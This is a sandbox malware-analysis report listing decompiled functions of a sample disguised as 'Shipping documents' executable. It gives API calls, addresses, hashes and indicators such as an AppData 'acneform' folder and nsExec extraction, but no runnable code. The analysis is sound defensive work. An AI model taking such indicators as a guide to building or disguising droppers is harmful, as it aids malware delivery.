                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: FilePointer
                                        • String ID:
                                        • API String ID: 973152223-0
                                        • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                        • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                        • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                        • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,004042CF), ref: 00404502
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        • Opcode ID: faa9f1bbc6a73408ed15535010d366895e2d742fa65bef251b9024de670fa5bb
                                        • Instruction ID: 186c68f4495094c0cebc3eb7279f68ffc90812dad8dfd9e689695b78415bb769
                                        • Opcode Fuzzy Hash: faa9f1bbc6a73408ed15535010d366895e2d742fa65bef251b9024de670fa5bb
                                        • Instruction Fuzzy Hash: 43A00176544A04ABCE12EB50EF4990ABB62BBA4B01B618879A285514388B325921EB19
                                        APIs
                                          • Part of subcall function 004055DC: lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,00000000,00424620,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                          • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,00000000,00424620,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                          • Part of subcall function 004055DC: lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,0040341D,0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,00000000,00424620,762323A0), ref: 00405637
                                          • Part of subcall function 004055DC: SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll), ref: 00405649
                                          • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                          • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                          • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                          • Part of subcall function 00405B3A: CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
                                          • Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70
                                        • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0
                                          • Part of subcall function 004069F6: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406A07
                                          • Part of subcall function 004069F6: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A29
                                          • Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                        • String ID:
                                        • API String ID: 2972824698-0
                                        • Opcode ID: 3e0ab9320d322eb7e83734c8f16b68858ef74ab2c998c223a53f08904ab87bbd
                                        • Instruction ID: 72ab4701d282d41bfb99937ccb951c9b3d992b5a19319da95f503844dddfcbd3
                                        • Opcode Fuzzy Hash: 3e0ab9320d322eb7e83734c8f16b68858ef74ab2c998c223a53f08904ab87bbd
                                        • Instruction Fuzzy Hash: EEF0F032804015ABCB20BBA199849DE72B5CF00318B21413FE102B21D1C77C0E42AA6E
                                        APIs
                                        • GetDlgItem.USER32(?,000003FB), ref: 00404A16
                                        • SetWindowTextW.USER32(00000000,?), ref: 00404A40
                                        • SHBrowseForFolderW.SHELL32(?), ref: 00404AF1
                                        • CoTaskMemFree.OLE32(00000000), ref: 00404AFC
                                        • lstrcmpiW.KERNEL32(Exec,0042CA68,00000000,?,?), ref: 00404B2E
                                        • lstrcatW.KERNEL32(?,Exec), ref: 00404B3A
                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B4C
                                          • Part of subcall function 00405B9B: GetDlgItemTextW.USER32(?,?,00000400,00404B83), ref: 00405BAE
                                          • Part of subcall function 00406805: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe",76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
                                          • Part of subcall function 00406805: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
                                          • Part of subcall function 00406805: CharNextW.USER32(?,"C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe",76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
                                          • Part of subcall function 00406805: CharPrevW.USER32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F
                                        • GetDiskFreeSpaceW.KERNEL32(0042AA38,?,?,0000040F,?,0042AA38,0042AA38,?,00000001,0042AA38,?,?,000003FB,?), ref: 00404C0F
                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C2A
                                          • Part of subcall function 00404D83: lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
                                          • Part of subcall function 00404D83: wsprintfW.USER32 ref: 00404E2D
                                          • Part of subcall function 00404D83: SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: A$C:\Users\user\AppData\Local\acneform$Exec
                                        • API String ID: 2624150263-2768821173
                                        • Opcode ID: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
                                        • Instruction ID: 8a45afd3ee22384d80319c7ed67abe130e578f1d2b392c1e8909742cb30e522b
                                        • Opcode Fuzzy Hash: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
                                        • Instruction Fuzzy Hash: FCA192B1900208ABDB11EFA5DD45BAFB7B8EF84314F11803BF611B62D1D77C9A418B69
                                        APIs
                                        • CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E
                                        Strings
                                        • C:\Users\user\AppData\Local\acneform\Baroco, xrefs: 0040226E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: CreateInstance
                                        • String ID: C:\Users\user\AppData\Local\acneform\Baroco
                                        • API String ID: 542301482-727163374
                                        • Opcode ID: 7326b08ec6d512b6b783f70a6e13437ea8f5b6047ef19b1df3461ee5cf714417
                                        • Instruction ID: f0c409d0c9855dc16f3492d495f607d4fcaf843261c47ee8c1995525671fe781
                                        • Opcode Fuzzy Hash: 7326b08ec6d512b6b783f70a6e13437ea8f5b6047ef19b1df3461ee5cf714417
                                        • Instruction Fuzzy Hash: 76411471A00208AFCB40DFE4C989EAD7BB5FF48308B20457AF515EB2D1DB799982CB54
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
                                        • Instruction ID: a5eb8001d75a17d38d83411349fde439c8a9064fda1b18d7f978e280ae41e255
                                        • Opcode Fuzzy Hash: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
                                        • Instruction Fuzzy Hash: ACE19C71A04709DFCB24CF58C880BAABBF1FF45305F15852EE496A72D1E378AA51CB05
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
                                        • Instruction ID: e409ec8ffb443055957628c835c79614664982182129ebc37b3e11cb9bcd83e5
                                        • Opcode Fuzzy Hash: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
                                        • Instruction Fuzzy Hash: ECC14772E04219CBCF18CF68C4905EEBBB2BF98354F25866AD85677380D7346942CF95
                                        APIs
                                        • GetDlgItem.USER32(?,000003F9), ref: 00404F5B
                                        • GetDlgItem.USER32(?,00000408), ref: 00404F66
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404FB0
                                        • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FC7
                                        • SetWindowLongW.USER32(?,000000FC,00405550), ref: 00404FE0
                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FF4
                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405006
                                        • SendMessageW.USER32(?,00001109,00000002), ref: 0040501C
                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405028
                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040503A
                                        • DeleteObject.GDI32(00000000), ref: 0040503D
                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405068
                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405074
                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040510F
                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040513F
                                          • Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405153
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00405181
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040518F
                                        • ShowWindow.USER32(?,00000005), ref: 0040519F
                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040529A
                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052FF
                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405314
                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405338
                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405358
                                        • ImageList_Destroy.COMCTL32(?), ref: 0040536D
                                        • GlobalFree.KERNEL32(?), ref: 0040537D
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053F6
                                        • SendMessageW.USER32(?,00001102,?,?), ref: 0040549F
                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054AE
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004054D9
                                        • ShowWindow.USER32(?,00000000), ref: 00405527
                                        • GetDlgItem.USER32(?,000003FE), ref: 00405532
                                        • ShowWindow.USER32(00000000), ref: 00405539
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                        • String ID: $M$N
                                        • API String ID: 2564846305-813528018
                                        • Opcode ID: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
                                        • Instruction ID: 91097811874ce85ba3cc7540bcf7dd58db25a3d6f071223140e4d1ec27d7ea12
                                        • Opcode Fuzzy Hash: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
                                        • Instruction Fuzzy Hash: 6C029C70900608AFDF20DF94DD85AAF7BB5FB85314F10817AE611BA2E1D7798A41CF58
                                        APIs
                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404733
                                        • GetDlgItem.USER32(?,000003E8), ref: 00404747
                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404764
                                        • GetSysColor.USER32(?), ref: 00404775
                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404783
                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404791
                                        • lstrlenW.KERNEL32(?), ref: 00404796
                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004047A3
                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047B8
                                        • GetDlgItem.USER32(?,0000040A), ref: 00404811
                                        • SendMessageW.USER32(00000000), ref: 00404818
                                        • GetDlgItem.USER32(?,000003E8), ref: 00404843
                                        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404886
                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00404894
                                        • SetCursor.USER32(00000000), ref: 00404897
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 004048B0
                                        • SetCursor.USER32(00000000), ref: 004048B3
                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048E2
                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048F4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                        • String ID: Exec$N
                                        • API String ID: 3103080414-17853963
                                        • Opcode ID: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
                                        • Instruction ID: 3ad42440e7936429012ccc374b67200ab01768f99e4ad58672f49272ac14a637
                                        • Opcode Fuzzy Hash: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
                                        • Instruction Fuzzy Hash: 2E6181B1900209BFDB10AF60DD85EAA7B69FB84315F00853AFA05B62D0C779A951DF98
                                        APIs
                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                        • BeginPaint.USER32(?,?), ref: 00401047
                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                        • DeleteObject.GDI32(?), ref: 004010ED
                                        • CreateFontIndirectW.GDI32(?), ref: 00401105
                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                        • DrawTextW.USER32(00000000,00433700,000000FF,00000010,00000820), ref: 00401156
                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                        • DeleteObject.GDI32(?), ref: 00401165
                                        • EndPaint.USER32(?,?), ref: 0040116E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                        • String ID: F
                                        • API String ID: 941294808-1304234792
                                        • Opcode ID: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
                                        • Instruction ID: eca0ad76d85821e0a7fbe67f508e5060b260b918cc65b70bf06bca200ae74670
                                        • Opcode Fuzzy Hash: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
                                        • Instruction Fuzzy Hash: 2F418B71800209AFCB058FA5DE459AFBFB9FF45314F00802EF591AA1A0C738EA54DFA4
                                        APIs
                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406338,?,?), ref: 004061D8
                                        • GetShortPathNameW.KERNEL32(?,00430108,00000400), ref: 004061E1
                                          • Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
                                          • Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE
                                        • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061FE
                                        • wsprintfA.USER32 ref: 0040621C
                                        • GetFileSize.KERNEL32(00000000,00000000,00430908,C0000000,00000004,00430908,?,?,?,?,?), ref: 00406257
                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406266
                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040629E
                                        • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,0042FD08,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F4
                                        • GlobalFree.KERNEL32(00000000), ref: 00406305
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040630C
                                          • Part of subcall function 00406047: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe,80000000,00000003), ref: 0040604B
                                          • Part of subcall function 00406047: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
